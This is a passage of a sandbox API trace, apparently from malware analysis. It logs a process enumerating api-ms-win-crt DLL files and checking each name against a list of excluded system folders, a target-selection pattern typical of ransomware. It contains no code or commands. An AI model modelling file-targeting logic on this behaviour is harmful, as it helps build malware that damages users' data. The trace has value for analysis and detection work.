(lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="..") returned 1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="...") returned 1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="windows") returned -1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="recovery") returned -1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="msocache") returned -1 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x1f8328, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x1f84e8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.497] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="AP0479~1.DLL")) returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2=".") returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="..") returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="...") returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="windows") returned -1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="recovery") returned -1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="msocache") returned -1 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0067.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x1f8328, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0067.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x1f84e8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0067.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.497] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2=".") returned 1 [0067.497] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="..") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="...") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="windows") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="recovery") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="msocache") returned -1 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.498] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2=".") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="..") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="...") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="windows") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="recovery") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.498] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="msocache") returned -1 [0067.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x1f84e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x1f8328, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.499] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2=".") returned 1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="..") returned 1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="...") returned 1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="windows") returned -1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="recovery") returned -1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.499] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="msocache") returned -1 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.500] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2=".") returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="..") returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="...") returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="windows") returned -1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="recovery") returned -1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="msocache") returned -1 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0067.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x1f8328, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0067.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x1f84e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0067.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.500] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0067.500] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2=".") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="..") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="...") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="windows") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="recovery") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="msocache") returned -1 [0067.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0067.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0067.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0067.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.501] RtlAllocateHeap 